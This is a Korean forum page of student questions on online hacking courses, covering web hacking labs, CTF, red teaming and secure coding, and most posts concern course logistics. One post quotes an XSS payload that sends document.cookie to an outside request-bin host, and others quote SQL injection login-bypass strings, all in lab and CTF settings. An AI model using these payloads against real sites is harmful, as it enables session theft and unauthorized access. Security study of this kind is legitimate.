묻고 답해요
161만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결RTL - 레드팀 맛보기
수료증 발급이 필요합니다. 강의자료 파트좀 해결해주세요
강의 동영상 X, 강의 자료X 없는 파트가 4개가 있어서이수가 안되니 수료도 불가합니다수료증 발급이 필요한데 인프런 고객센터는 연락이 안됩니다.수료증 발급 할 수 있게 빈 파일이라도 올려주세요부탁드립니다
-
미해결주요정보통신기반시설 2025버전 관리, 물리 Risk 평가
원래 소리가 없는 강의예요?
설명 없이 PPT만 띄워주고 마는 강의인가요? 미리보기때도 소리 안나오길래 강의 수가 얼마 안되어서 그런가보다 했는데 결제 후에도 전부 다 소리가 안나오는데 이게 맞나요? 이럼 수강할 필요가 없는데
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
미션 어떻게 하는 거에요?
미션하라고만 하고 내용이 안떠요;;;
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
XSS 1번문제 질문
XSS 1번 문제 질문 드립니다. 웹 모의해킹에 대한 초보입장에서 시작부터 막히는 상황이라서요.. document.cookie를 통해 cookie값을 알아오기 위해 자신의 웹서버 주소와 포트번호는 어떻게 확인할 수 있나요? cmd>ipconfig를 통해 그냥 IP주소로 입력해도 되는건가요?.. 포트번호는 VM 요청시 받아온 포트번호가 맞을까요?ㅠ
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
xss_WAF_4가 안 됩니다
<iframe srcdoc = "<script>fetch('https://mamibjs.request.dreamhack.games/?'+document.cookie)</script>">서버 주소는 드림핵 툴즈 이용했습니다. 스크립트를 위처럼 작성하고 activate admin bot 버튼 누르면 전송이 와야 되는데 안 옵니다. 제가 직접 작성한 글을 클릭해서 하는건 전송이 또 되는데 어드민 봇이 안되는 거 같습니다. 추가로 xss_WAF_3으로도 해봤는데 이것같은 경우는 정상 작동했습니다.
-
미해결성공적인 SQL 인젝션 공격을 위한, SQL 기본 문법
화면 크기에 대하여
강의 영상을 보면서 따라하기에는 터미널 화면이 너무 작네요. 그냥 눈으로만 볼 수 있을 뿐...따라하면서 배우기는 어려운 강의라고 생각됩니다.
-
미해결RTL - 레드팀 맛보기
강의 자료도 진도율에 포함하여 수강 완료 처리해 주세요.
수업 자료가 진도율에 포함이 되지 않습니다.그래서 강의를 모두 수강하였지만 10% 부족으로 나옵니다.수강 완료 후 받을 수 있는 수료증 발급이 필요합니다.
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
백슬래시에 관하여
실습 중 백슬래시를 세개 사용하여 로그인 시도 중 로그인이 가능한 것을 확인하였습니다. '\'의 경우 이스케이프 문자로 뒤에 오는 값을 문자열로 표현하기 위함으로 알고 있습니다. 그렇다면 '\\'로 사용하면 문자열로서의 "\"가 될것인데,id 값에 '\\\'를 넣을 경우id='\\\'가 됨으로서 최종 id의 값은 문자열로서의 "\'"가 되는 것으로 생각이 되는데 어떻게 로그인이 가능한 것일까요?
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
basic_bof.py가 없어요
압축파일을 해제했는데,강사님처럼 파이썬 파일(.py)는 없네요.pwntools도 깔았는데...어떻게 하면 되는지 알려주시면 감사하겠습니다~
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
cmd로 검색하면 잘 나오는데 웹 페이지에서 작성하면 결과값이 안 나옵니다.
강의처럼‘ union select 'test','test',null,null,'test',null,null,null,null#라고 치고 검색버튼을 누르면 아무런 결과값이 안 나오는데, cmd창에서 쿼리문 작성시 결과값이 잘 나옵니다. 이유가 뭔지 궁금합니다! ㅜㅜ세팅은 똑같이 따라했습니다
-
미해결입문자를 위한 웹해킹 완벽 실습 with Beebox
IPS, WAF 구현했는데 공부에 지장이 있을까요?
GNS3에 IPS, WAF 구현했는데 해당 기능 써도 될까요?혹시 공부에 지장이 있을까요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
SQL Injection - Login
ID 입력란에 페이로드(admin' AND 1=1 -- ) 삽입 시 정상적으로 플래그가 도출되었으나 ID에 'admin', PW 입력란에 페이로드(1' or 1=1 -- ) 삽입 시 플래그가 도출되지 않았습니다. 두번째의 경우ID='admin'AND PW=' 1' or 1=1 -- ' 로 ID가 'admin'이고 PW가 쿼리로 인해 항상 참인데 왜 플래그가 도출되지 않는지 모르겠습니다.
-
미해결모의해킹 실무자가 알려주는, XSS 공격 기법
주의사항 1
수업을 들으면서 민감한 기능을 사용에 주의해야 한다고 하셨는데 그러면 만약 실무진단 도중에 Xss의 위험을 발견하고 세션하이재킹을 시도해보고 싶다면 독단적인 판단이 아니라 담당자와의 이야기를 한 후에 진행해야하나요? 아니면 이런 세세한 부분은 이야기하지 않고 후에 보고서로 제출하는 건가요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
저 웹페이지는 어떻게 들어가나요?
맥북이라 htdocs말고 맥북에 해당하는 폴더에 넣고 localhost/폴더명(insecure_website)/치는데 파일들의 리스트가 뜹니다Index of /insecure_websiteParent Directoryaction.phpauth.phpcommon.phpcss/dom.phpdownload.phperror.phphtmlpurifier/index.phpjoin.phpjs/list.phplogin.phplogout.phpmodify.phpmypage.phppingcheck.phpquery.txtupload/view.phpwithdrawal.phpwrite.phpxmlparser.phpindex.php로 들어갈 경우 아래와 같은 것이 화면에 출력되어,location.href='index.php?page=error&value={$page}';"; } ?>short_open_tag => On => On 이걸로 설정바꿨는데도 계속 똑같습니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
맥북은 어떻게 설치해야 하나요?
.exe파일이 열리지 않습니다
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
dvwa
dvwa 파일이 사이트에 없습니다
-
미해결BHPT - 호스트 기반 모의해킹 기초
받은 메일에는 코드가 없습니다. 그래서 /verify 코드 입력을 진행할 수 없습니다
레드라쿤 가이드북 애플리케이션에서 초대를 받았습니다!메일에는 아래 내용만 있고 코드가 없습니다. 레드라쿤 가이드북레드라쿤 가이드북 애플리케이션에 가입한 기록이 있습니다.아래 버튼을 클릭하여 계정 비밀번호를 설정하고 접근 권한을 얻으세요:비밀번호 설정비밀번호 설정를 클릭할 수 없을 때는 웹 브라우저에서 다음 링크로 접속할 수 있습니다.https://guides.redraccoon.kr/register/invite/ztoviU9MYpbRfBIEhamCAOt5그래서 /verify 코드 입력을 진행할 수 없습니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
vtcsec 오류
해당 내용을 추가했는데도 페이지가 이쁘게 나오지 않고 그대로 나오는데 왜 이러는지 알려주시면 감사하겠습니다!ㅠㅠ
-
미해결RTL - 레드팀 맛보기
가이드북 신청 질문
가이드북 접근 신청을 하는것만으로도 AWS추가비용이 발생한다는건가요 아니면 가이드북신청해놓고 공부할때 사용할때 비용이 발생하기 시작한다는것인가요?
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
zenmap 설치 오류
zenmap 설치 과정에서 이렇게 결과가 나오는데 어떻게 해결해야 될지 알려주시면 감사하겠습니다...ㅠㅠ 칼리 버전은 2025.2 입니다
